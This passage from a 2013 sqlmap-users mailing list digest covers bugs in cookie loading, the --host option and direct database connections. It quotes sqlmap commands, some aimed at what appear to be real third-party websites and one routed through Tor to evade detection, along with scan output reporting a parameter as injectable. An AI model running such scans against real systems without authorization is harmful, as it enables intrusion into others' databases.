>>>> > AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHD
>>>> > D=2781203&MS=2781203&AF=NOFORM
>>>> > .bing.com TRUE / FALSE 1429089794 OrigMUID
>>>> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> > .bing.com TRUE / FALSE 1429089794 MUID
>>>> > 333995A69E06630B2EB491169F016314
>>>> > .bing.com TRUE / FALSE 0 _SS
>>>> > SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> > .bing.com TRUE / FALSE 0 _HOP
>>>> > .bing.com TRUE / FALSE 0 _FS NU=1
>>>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>>> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> > www.bing.com FALSE / FALSE 1429089794 MUIDB
>>>> > 333995A69E06630B2EB491169F016314
>>>> >
>>>> > prompt%
>>>> >
>>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>>> unix
>>>> > time instead of 0 in there.
>>>> >
>>>> > Ok: With the prev rev ed5599f it reads this file ok (no session
>>>> cookies
>>>> > but cookies w/ expiration date) and uses the last
>>>> > cookie only for the first 120 tries.
>>>> >
>>>> > Cheers, Dirk
>>>> >
>>>> >
>>>> > >
>>>> > > Kind regards,
>>>> > > Miroslav Stampar
>>>> > >
>>>> > >
>>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
>>>> <mailto:
>>>> > sp...@dr...>> wrote:
>>>> > >
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > thx for your prompt answer.
>>>> > >
>>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > > Hi Dirk.
>>>> > > >
>>>> > > > Could you please get the latest revision and retry it again?
>>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>>> > only this one.
>>>> > > The slight difference seems to be that in the case where I
>>>> > didn't supply a cookie
>>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from
>>>> > the server anymore.
>>>> > > >
>>>> > > > There was a situation where info messages have been wrongly
>>>> > written that original response contained Set-Cookie in situations like
>>>> > yours.
>>>> > > >
>>>> > > > In case that everything stays as it is, I'll need to ask you
>>>> > to provide more details. For example, cookie file would be great.
>>>> > >
>>>> > > sure, here you go:
>>>> > >
>>>> > > --snip
>>>> > > # Netscape HTTP Cookie File
>>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
>>>> > \t <Cookie>
>>>> > > [..]
>>>> > > --snap
>>>> > >
>>>> > > They are all session cookies. For easier reading here I put some
>>>> > blanks in the line
>>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>>> > generated with
>>>> > > stompy and a shell script (looks he same as with
>>>> > > wget -S -O /dev/null --keep-session-cookies
>>>> > --save-cookies=<file> <URL>)
>>>> > >
>>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies
>>>> > file ;-)
>>>> > >
>>>> > > >
>>>> > > > Also, please make sure that the cookie file contains proper
>>>> > cookie(s) - domain name should be the same as a domain of target,
>>>> cookie
>>>> > needs to have a proper valid time, etc.
>>>> > >
>>>> > > see above.
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
>>>> > sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr...<mailto:
>>>> > sp...@dr...>>> wrote:
>>>> > > >
>>>> > > > Hi Miroslav,
>>>> > > >
>>>> > > > yes unfortunately.
>>>> > > >
>>>> > > > If I omit the cookie line in the request header
>>>> > completely, sqlmap
>>>> > > > seems to take the first cookie issued by the server with
>>>> > set-cookie (and
>>>> > > > put's it silently in).
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > > Hi.
>>>> > > > >
>>>> > > > > And this is also happening if you are skipping "Cookie:
>>>> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
>>>> request?
>>>> > > > >
>>>> > > > > Kind regards,
>>>> > > > > Miroslav Stampar
>>>> > > > >
>>>> > > > >
>>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
>>>> > sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr...<mailto:
>>>> > sp...@dr...>> <mailto:sp...@dr... <mailto:
>>>> sp...@dr...>
>>>> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>>> > > > >
>>>> > > > >
>>>> > > > > Hi folks,
>>>> > > > >
>>>> > > > > .... that doesn't work for me. It always uses the
>>>> > cookie supplied
>>>> > > > > (below in $REQUEST, or if I omit the line in
>>>> > $REQUEST the one
>>>> > > > > from the 1st server reply is being used)
>>>> > > > >
>>>> > > > > So what is wrong in here:
>>>> > > > >
>>>> > > > > cd
>>>> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > > --level=2 --risk=2 -r $REQUEST
>>>> > > > >
>>>> > > > > The content of the file $REQUEST is:
>>>> > > > >
>>>> > > > > POST <URL> HTTP/1.1
>>>> > > > > Host: <HOST>
>>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
>>>> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <
>>>> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>>> > > > > Accept:
>>>> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > > Accept-Language: en-US,en;q=0.5
>>>> > > > > Accept-Encoding: gzip, deflate
>>>> > > > > Referer: <Referer>
>>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > > Connection: keep-alive
>>>> > > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > > Content-Length: 67
>>>> > > > >
>>>> > > > > <abunchofpostparams>
>>>> > > > >
>>>> > > > >
>>>> > > > > No hints that cookie-file is not in correct format
>>>> > (I've been through this,
>>>> > > > > at least I think I so ;) ).
>>>> > > > >
>>>> > > > > Any insight would be much appreciated.
>>>> > > > >
>>>> > > > >
>>>> > > > > Cheers,
>>>> > > > >
>>>> > > > > Dirk
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> >
>>>> ------------------------------------------------------------------------------
>>>> > > > > Precog is a next-generation analytics platform
>>>> > capable of advanced
>>>> > > > > analytics on semi-structured data. The platform
>>>> > includes APIs for building
>>>> > > > > apps and a phenomenal toolset for data science.
>>>> > Developers can use
>>>> > > > > our toolset for easy data analysis & visualization.
>>>> > Get a free account!
>>>> > > > >
>>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > > > > _______________________________________________
>>>> > > > > sqlmap-users mailing list
>>>> > > > > sql...@li... <mailto:
>>>> > sql...@li...> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...>> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...>>>
>>>> > > > >
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > > --
>>>> > > > > Miroslav Stampar
>>>> > > > > http://about.me/stamparm
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> >
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 4
>>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>>>> clean_filesystem
>>>> To: Brandon Perry <bpe...@gm...>
>>>> Cc: sqlmap users <sql...@li...>
>>>> Message-ID:
>>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi Brandon.
>>>>
>>>> Thank you for your patch and find it now included [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>>
>>>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>>
>>>>
>>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <
>>>> bpe...@gm...>wrote:
>>>>
>>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>>>> api
>>>> > call when self.output_directory is NoneType and clean_system() is
>>>> called.
>>>> >
>>>> > --
>>>> > http://volatile-minds.blogspot.com -- blog
>>>> > http://www.volatileminds.net -- website
>>>> >
>>>> >
>>>> >
>>>> ------------------------------------------------------------------------------
>>>> > Precog is a next-generation analytics platform capable of advanced
>>>> > analytics on semi-structured data. The platform includes APIs for
>>>> building
>>>> > apps and a phenomenal toolset for data science. Developers can use
>>>> > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > _______________________________________________
>>>> > sqlmap-users mailing list
>>>> > sql...@li...
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> >
>>>> >
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 5
>>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>>> From: Dirk Wetter <sp...@dr...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <516...@dr...>
>>>> Content-Type: text/plain; charset=ISO-8859-1
>>>>
>>>> Hi Miroslav,
>>>>
>>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>>> > Hi Dirk.
>>>> >
>>>> > Now that crash should be "patched".
>>>> >
>>>> > Could you please retry it now and say if the latest revision suits
>>>> your needs?
>>>>
>>>> cool, thx. Works!
>>>>
>>>> However (sorry):
>>>>
>>>> One needs to omit the cookie in the request header, otherwise it just
>>>> uses the one
>>>> supplied by the request.
>>>>
>>>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>>>> correctly
>>>> but my point was using the load-cookies option to direct sqlmap to
>>>> change
>>>> cookies once in a while (whenever that's gonna be). This is to
>>>> circumvent
>>>> restrictions one can encounter otherwise....
>>>>
>>>> Cheers,
>>>>
>>>> Dirk
>>>>
>>>>
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> >
>>>> >
>>>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...>> wrote:
>>>> >
>>>> >
>>>> >
>>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > > Nevertheless, with the latest commit that check should be
>>>> "neutralized" now. Could you please retry it now?
>>>> >
>>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> hiccups, using the same file:
>>>> >
>>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
>>>> > Traceback (most recent call last):
>>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>>> _really_load
>>>> > assert domain_specified == initial_dot
>>>> > AssertionError
>>>> >
>>>> > _warn_unhandled_exception()
>>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>> >
>>>> > the 999.. looks strange to me.
>>>> >
>>>> > >
>>>> > >
>>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>>> mir...@gm... <mailto:mir...@gm...> <mailto:
>>>> mir...@gm... <mailto:mir...@gm...>>> wrote:
>>>> > >
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Well, I would say that you have an expired cookie. Do you see that
>>>> value 0? That value should be a valid UNIX time representing time of cookie
>>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>>> "[WARNING] cookie '....' has expired"
>>>> > >
>>>> >
>>>> > that's true but IMO 0 represents just a session cookie. Example:
>>>> >
>>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>>> --save-cookies=/dev/stdout bing.com <http://bing.com>
>>>> > # HTTP cookie file.
>>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>>> > # Edit at your own risk.
>>>> >
>>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR
>>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD
>>>> D=2781203&MS=2781203&AF=NOFORM
>>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID
>>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID
>>>> 333995A69E06630B2EB491169F016314
>>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _SS
>>>> SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _HOP
>>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1
>>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1
>>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID
>>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB
>>>> 333995A69E06630B2EB491169F016314
>>>> >
>>>> > prompt%
>>>> >
>>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>>> unix time instead of 0 in there.
>>>> >
>>>> > Ok: With the prev rev ed5599f it reads this file ok (no session
>>>> cookies but cookies w/ expiration date) and uses the last
>>>> > cookie only for the first 120 tries.
>>>> >
>>>> > Cheers, Dirk
>>>> >
>>>> >
>>>> > >
>>>> > > Kind regards,
>>>> > > Miroslav Stampar
>>>> > >
>>>> > >
>>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>>> wrote:
>>>> > >
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > thx for your prompt answer.
>>>> > >
>>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > > Hi Dirk.
>>>> > > >
>>>> > > > Could you please get the latest revision and retry it again?
>>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>>> only this one.
>>>> > > The slight difference seems to be that in the case where I didn't
>>>> supply a cookie
>>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>>> server anymore.
>>>> > > >
>>>> > > > There was a situation where info messages have been wrongly
>>>> written that original response contained Set-Cookie in situations like
>>>> yours.
>>>> > > >
>>>> > > > In case that everything stays as it is, I'll need to ask you to
>>>> provide more details. For example, cookie file would be great.
>>>> > >
>>>> > > sure, here you go:
>>>> > >
>>>> > > --snip
>>>> > > # Netscape HTTP Cookie File
>>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>>> > > [..]
>>>> > > --snap
>>>> > >
>>>> > > They are all session cookies. For easier reading here I put some
>>>> blanks in the line
>>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>>> generated with
>>>> > > stompy and a shell script (looks he same as with
>>>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>>> <URL>)
>>>> > >
>>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file
>>>> ;-)
>>>> > >
>>>> > > >
>>>> > > > Also, please make sure that the cookie file contains proper
>>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>>> needs to have a proper valid time, etc.
>>>> > >
>>>> > > see above.
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>>> > > >
>>>> > > > Hi Miroslav,
>>>> > > >
>>>> > > > yes unfortunately.
>>>> > > >
>>>> > > > If I omit the cookie line in the request header completely, sqlmap
>>>> > > > seems to take the first cookie issued by the server with
>>>> set-cookie (and
>>>> > > > put's it silently in).
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > > Hi.
>>>> > > > >
>>>> > > > > And this is also happening if you are skipping "Cookie:
>>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>>> > > > >
>>>> > > > > Kind regards,
>>>> > > > > Miroslav Stampar
>>>> > > > >
>>>> > > > >
>>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr... <mailto:sp...@dr...>>> <mailto:
>>>> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
>>>> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
>>>> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>>>> > > > >
>>>> > > > >
>>>> > > > > Hi folks,
>>>> > > > >
>>>> > > > > .... that doesn't work for me. It always uses the cookie
>>>> supplied
>>>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>>> > > > > from the 1st server reply is being used)
>>>> > > > >
>>>> > > > > So what is wrong in here:
>>>> > > > >
>>>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > > --level=2 --risk=2 -r $REQUEST
>>>> > > > >
>>>> > > > > The content of the file $REQUEST is:
>>>> > > > >
>>>> > > > > POST <URL> HTTP/1.1
>>>> > > > > Host: <HOST>
>>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>>> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>>> > > > > Accept:
>>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > > Accept-Language: en-US,en;q=0.5
>>>> > > > > Accept-Encoding: gzip, deflate
>>>> > > > > Referer: <Referer>
>>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > > Connection: keep-alive
>>>> > > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > > Content-Length: 67
>>>> > > > >
>>>> > > > > <abunchofpostparams>
>>>> > > > >
>>>> > > > >
>>>> > > > > No hints that cookie-file is not in correct format (I've been
>>>> through this,
>>>> > > > > at least I think I so ;) ).
>>>> > > > >
>>>> > > > > Any insight would be much appreciated.
>>>> > > > >
>>>> > > > >
>>>> > > > > Cheers,
>>>> > > > >
>>>> > > > > Dirk
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> ------------------------------------------------------------------------------
>>>> > > > > Precog is a next-generation analytics platform capable of
>>>> advanced
>>>> > > > > analytics on semi-structured data. The platform includes APIs
>>>> for building
>>>> > > > > apps and a phenomenal toolset for data science. Developers can
>>>> use
>>>> > > > > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > > > > _______________________________________________
>>>> > > > > sqlmap-users mailing list
>>>> > > > > sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>>> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>>>>
>>>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > > --
>>>> > > > > Miroslav Stampar
>>>> > > > > http://about.me/stamparm
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 6
>>>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>>>> From: <co...@5i...>
>>>> Subject: [sqlmap-users] --host parameter
>>>> To: sql...@li...
>>>> Message-ID:
>>>> <
>>>> 201...@em...
>>>> >
>>>>
>>>> Content-Type: text/plain; charset="utf-8"
>>>>
>>>> Hello,
>>>> the --host doesn't work as expected, or I am doing something wrong:
>>>>
>>>>
>>>> this works as expected:
>>>>
>>>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>>
>>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>>> takeover tool
>>>> http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by
>>>> this program
>>>>
>>>> [*] starting at 23:57:15
>>>>
>>>> [23:57:15] [INFO] testing connection to the target URL
>>>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>>> [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>>> couple of seconds
>>>> [23:57:16] [INFO] target URL is stable
>>>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>>> might be injectable (possible DBMS: 'MySQL')
>>>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>>
>>>>
>>>> ....
>>>>
>>>>
>>>> this doesn't work as expected:
>>>>
>>>> ./sqlmap.py --host='i.csland.ro'
>>>> --url='http://188.240.236.15/index.php?id=0'
>>>>
>>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>>> takeover tool
>>>> http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by
>>>> this program
>>>>
>>>> [*] starting at 23:58:03
>>>>
>>>> [23:58:03] [INFO] testing connection to the target URL
>>>> [23:58:03] [CRITICAL] page not found (404)
>>>> it is not recommended to continue in this kind of cases. Do you want to
>>>> quit and make sure that everything is set up properly? [Y/n]
>>>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>>>
>>>> ............
>>>>
>>>>
>>>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>>
>>>> Thanks.
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 7
>>>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>>>> From: ???????? ?????? <vo...@s2...>
>>>> Subject: [sqlmap-users] Sqlmap and direct connect error
>>>> To: sql...@li...
>>>> Message-ID: <C59...@s2...>
>>>> Content-Type: text/plain; charset=us-ascii
>>>>
>>>> Hi!
>>>>
>>>> This bug detected if add direct param.
>>>>
>>>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>>> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>>> --exclude-sysdbs
>>>>
>>>>
>>>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>>> retry your run with the latest development version from the GitHub
>>>> repository. If the exception persists, please send by e-mail to '
>>>> sql...@li...' or open a new issue at '
>>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any information required to reproduce the bug. The developers will
>>>> try to reproduce the bug, fix it accordingly and get back to you.
>>>> sqlmap version: 1.0-dev-de99717
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: sqlmap.py -d
>>>> **************************************************** -u
>>>> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>>> --exclude-sysdbs
>>>> Technique: None
>>>> Back-end DBMS: MySQL (identified)
>>>> Traceback (most recent call last):
>>>> File "sqlmap.py", line 87, in main
>>>> start()
>>>> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>>> start
>>>> action()
>>>> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>>> setHandler()
>>>> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>>> setHandler
>>>> conf.dbmsConnector.connect()
>>>> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
>>>> in connect
>>>> self.connector = pymysql.connect(host=self.hostname, user=self.user,
>>>> passwd=self.password, db=self.db, port=self.port,
>>>> connect_timeout=conf.timeout, use_unicode=True)
>>>> File
>>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>>>> line 93, in Connect
>>>> return Connection(*args, **kwargs)
>>>> File
>>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>>> line 584, in __init__
>>>> self._connect()
>>>> File
>>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>>> line 739, in _connect
>>>> sock.connect((self.host, self.port))
>>>> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>>>> connect
>>>> raise GeneralProxyError((5, _generalerrors[5]))
>>>> GeneralProxyError: (5, 'bad input')
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 8
>>>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] --host parameter
>>>> To: co...@5i...
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CA+...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi.
>>>>
>>>> Thank you for your report and find it fixed with the latest commit [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>>
>>>> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>>>
>>>>
>>>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>>>
>>>> > Hello,
>>>> > the --host doesn't work as expected, or I am doing something wrong:
>>>> >
>>>> >
>>>> > this works as expected:
>>>> >
>>>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>> >
>>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>>> > takeover tool
>>>> > http://sqlmap.org
>>>> >
>>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> > prior mutual consent is illegal. It is the end user's responsibility
>>>> to
>>>> > obey all applicable local, state and federal laws. Developers assume
>>>> no
>>>> > liability and are not responsible for any misuse or damage caused by
>>>> > this program
>>>> >
>>>> > [*] starting at 23:57:15
>>>> >
>>>> > [23:57:15] [INFO] testing connection to the target URL
